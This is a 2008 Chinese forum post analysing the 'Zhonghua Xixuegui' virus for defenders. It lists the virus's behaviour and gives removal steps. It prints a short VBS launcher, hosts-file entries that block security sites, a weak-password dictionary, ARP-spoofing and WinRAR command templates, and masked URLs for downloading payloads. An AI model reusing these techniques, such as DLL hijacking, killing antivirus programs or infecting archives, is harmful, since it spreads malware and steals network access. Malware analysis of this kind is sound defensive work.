|
| 警惕恶意病毒“中华吸血鬼”! |
| 作者 depressedboy 查看 218 发表时间 2008/6/22 20:32 【论坛浏览】 |
|
下面是该病毒的详细分析报告:xsctjc xsctjc 病毒初始化过程:xsctjc xsctjc 1.创建一个互斥量:中华吸血鬼2.2xsctjc 2.删除SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}xsctjc 3.释放如下副本或文件:xsctjc %systemroot%\Tasks\绿化.batxsctjc %systemroot%\Tasks\csrss.exexsctjc %systemroot%\Tasks\wsock32.dllxsctjc 4.之后创建很多线程,执行多种病毒功能:xsctjc (1)通过GetWindowTextA函数获得窗口标题,并比较是否含有如下字样xsctjc wormxsctjc 卡巴斯基xsctjc 江民xsctjc 金山xsctjc Antixsctjc antixsctjc Virusxsctjc virusxsctjc Firewallxsctjc Mcafeexsctjc 查杀xsctjc 主动防御xsctjc 【请注意文明用语】xsctjc 系统保护xsctjc 主 动xsctjc 主动xsctjc 杀马xsctjc 木马xsctjc 上报xsctjc 举 报xsctjc 举报xsctjc 进 程xsctjc 进程xsctjc 系统安全xsctjc Processxsctjc NOD32xsctjc 专 杀xsctjc 专 杀xsctjc 专杀xsctjc 安全卫士xsctjc 绿鹰xsctjc ...xsctjc 如果含有则使用PostMessage函数会发送消息给他们:xsctjc 首先发送一个WM_Destroy,之后发送两个WM_Close 最后发一个WM_Destroy 的消息。并把窗口标题名保存下来。xsctjc 之后会调用Messageboxa函数弹出一个标题为"Windows盗版验证为"的窗口并显示如下字样“安全提示:您正在使用的(刚刚获得的窗口标题名称)是盗版软件,可能您是盗版软件的受害者,为了给合法用户提供保证,我们无法继续给您提供服务,请到指定销售商购买我们的正版软件,如果有任何疑问,请到我们微软主页查看http://www.microsoft.com”xsctjc
xsctjc (2) 破坏冰刃xsctjc 查找类名为Afxcontrolbar423s的窗口 xsctjc 然后发送WM_Close关闭 再模拟键盘输入按一下回车键xsctjc xsctjc (3) U盘传播功能xsctjc 检测可移动存储中是否有autorun.inf文件,如果有将其改名xsctjc 之后向里面写入autorun.infxsctjc 创建recycle.{645FF040-5081-101B-9F08-00AA002F954E}文件夹,在该文件夹内写入GHOSTBAK.exe(病毒文件)xsctjc xsctjc (4) 病毒感染统计xsctjc 搜集被感染主机的mac地址,并把被感染主机的mac地址和感染的病毒版本发送给http://www.*******.cn/tj/ct.asp页面xsctjc xsctjc (5) 修改hosts文件xsctjc 获得%programfiles%的环境变量,接着查找[url=file://\\drivers\etc\\hosts]\\drivers\etc\\hosts[/url]文件xsctjc 写入如下数据:xsctjc 127.0.0.0 360.qihoo.comxsctjc 127.0.0.1 qihoo.comxsctjc 127.0.0.1 www.qihoo.comxsctjc 127.0.0.1 www.qihoo.cnxsctjc 127.0.0.1 124.40.51.17xsctjc 127.0.0.1 58.17.236.92xsctjc 127.0.0.1 www.kaspersky.comxsctjc 127.0.0.1 60.210.176.251xsctjc 127.0.0.1 www.cnnod32.cnxsctjc 127.0.0.1 www.lanniao.orgxsctjc 127.0.0.1 www.nod32club.comxsctjc 127.0.0.1 www.dswlab.comxsctjc 127.0.0.1 bbs.sucop.comxsctjc 127.0.0.1 www.virustotal.comxsctjc 127.0.0.1 tool.ikaka.comxsctjc 127.0.0.1 www.jiangmin.comxsctjc 127.0.0.1 www.duba.netxsctjc 127.0.0.1 www.eset.com.cnxsctjc 127.0.0.1 www.nod32.comxsctjc 127.0.0.1 shadu.duba.netxsctjc 127.0.0.1 union.kingsoft.comxsctjc 127.0.0.1 www.kaspersky.com.cnxsctjc 127.0.0.1 kaspersky.com.cnxsctjc 127.0.0.1 virustotal.comxsctjc 127.0.0.1 www.360.cnxsctjc 127.0.0.1 www.360safe.cnxsctjc 127.0.0.1 www.360safe.comxsctjc 127.0.0.1 www.chinakv.comxsctjc 127.0.0.1 www.rising.com.cnxsctjc 127.0.0.1 rising.com.cnxsctjc 127.0.0.1 dl.jiangmin.comxsctjc 127.0.0.1 jiangmin.comxsctjc xsctjc 每1秒循环一次xsctjc xsctjc (6) 遍历进程,调用Terminate Process函数结束如下进程:xsctjc AST.exexsctjc 360tray.exexsctjc ast.exexsctjc FWMon.exexsctjc xsctjc (7) 遍历磁盘文件删除扩展名为gho,GHO,Gho的文件xsctjc xsctjc (8) arp欺骗功能xsctjc 获取本机IP地址 然后把所在同网段内的.2~.255的机器作为欺骗对象xsctjc 由系统目录下的arps.com执行%s -idx 0 -ip %s -port 80 -insert \"%s的命令 对局域网内机器进行arp欺骗xsctjc xsctjc (9) 局域网弱密码猜解传播xsctjc 以administrator为用户名,对局域网中其他机器进行密码猜解。如果成功则复制到对方机器的共享的C,D,E,F盘中,以hackshen.exexsctjc 病毒猜解的密码字典如下:xsctjc woainixsctjc babyxsctjc asdfxsctjc NULLxsctjc angelxsctjc asdfghxsctjc 1314520xsctjc 5201314xsctjc caonimaxsctjc 88888xsctjc bbbbbbxsctjc 12345678xsctjc memoryxsctjc abc123xsctjc qwertyxsctjc 123456xsctjc passwordxsctjc enterxsctjc hackxsctjc xpuserxsctjc moneyxsctjc yeahxsctjc timexsctjc gamexsctjc userxsctjc homexsctjc alexxsctjc guestxsctjc adminxsctjc testxsctjc administratorxsctjc moviexsctjc rootxsctjc lovexsctjc xsctjc (10)删除HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings键xsctjc 释放一个hackchen.vbs到%systemroot%\Tasksxsctjc hackchen.vbs内容:xsctjc On Error Resume Nextxsctjc Set rs=createObject("Wscript.shell")xsctjc rs.run "%windir%\Tasks\csrss.exe",0xsctjc 并且注册HKLM\SOFTWARE\Microsoft\Active Setup\InstalledComponents\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK} 指向%systemroot%\Tasks\hackchen.vbsxsctjc xsctjc (11) 病毒自动更新功能。在系统目录下释放meupdate.ini文件,并且和http://www.*******.cn/22.txt做比较,如果不同则下载http://www.*******.cn/server.exe(最新版病毒程序)到c:\_default.pif,并且每600ms执行一次xsctjc xsctjc (12)通过查找%ProgramFiles%的环境变量获得程序文件夹路径,之后查找[url=file://\\WinRAR\\Rar.exe]\\WinRAR\\Rar.exe[/url]获得winrar安装路径。xsctjc 遍历所有分区的.rar,.zip,.tgz,.cab,.tar文件 找到后xsctjc 后台调用winrar执行"(winrar路径)" -ep a "(找到的rar等文件路径)" %systemroot%\Tasks\绿化.bat 命令xsctjc 将绿化.bat压缩进压缩包,绿化.bat即为病毒本身,诱使用户点击中毒。xsctjc xsctjc (13)(此方法十分新颖)xsctjc 遍历所有文件夹并且将%systemroot%\Tasks\wsock32.dll 复制到每个文件夹下xsctjc 当该文件夹下的exe文件的导入表含有wsock32.dll的时候,会首先调用同文件夹下的wsock32.dll,也就是病毒释放的文件。此时会从下载http://www.*******.cn/server.exe(病毒最新版本)并执行!!!xsctjc xsctjc (14) 查找某些类名为#32770的窗口,并且试图发送"我做了快一个月了,每天2个小时有40-50元的收入,你也来看看吧,长期大量招聘网络兼职http://www.*******.cn/jianzhi.htm"的消息给对方(应该是通过QQ之类的聊天工具传播)xsctjc xsctjc (15) 遍历非系统分区的html,aspx,htm等文件 写入iframe代码xsctjc xsctjc (16)下载木马功能xsctjc 下载http://www.*******.cn/ft/qq.exexsctjc http://www.*******.cn/cj/qq.exexsctjc 并执行xsctjc xsctjc 清除方法不作赘述,安全模式下清理所有文件夹下的wsock32.dll,xsctjc 并利用工具清理%systemroot%\Tasks\绿化.batxsctjc %systemroot%\Tasks\csrss.exexsctjc 并打开所有压缩包文件 删除里面的绿化.bat。xsctjc 最后使用杀毒软件全盘杀毒xsctjc xsctjc 这也是一个浩大的工程吧~~xsctjc xsctjc 综观此病毒有很多新颖之处,首先是在关闭杀软之后弹出窗口,容易给不知情者以迷惑;其次病毒释放的wsock32.dll会使得任意该目录下的exe文件成为下载病毒文件的傀儡;再次由于windows的某些保护,tasks目录下的文件无法直接看到,这又给病毒了一个绝佳的藏身之地;最后,病毒还会将自己压缩到压缩包中,起一个诱惑的名字诱使用户再次中毒。xsctjc 最近恶性病毒以及木马群肆虐,但此类行为特征新颖的病毒也有所猖獗,望大家做好防范!xsctjc xsctjc [ 本帖最后由 depressedboy 于 2008-6-22 20:33 编辑 ] |
| 序号 | 评论者 | 共有评论 3 【论坛浏览】 【发表评论】 | 评论时间 |
| 1 | softbbq |         |
2008/6/22 21:50 |
| 2 | depressedboy | 回复 2楼 softbbq 的帖子 什么意思? |
2008/6/22 22:08 |
| 3 | sbynwtf | 太复杂了吧? |
2008/7/12 12:59 |
共有评论数 3 每页显示 10
|
|||
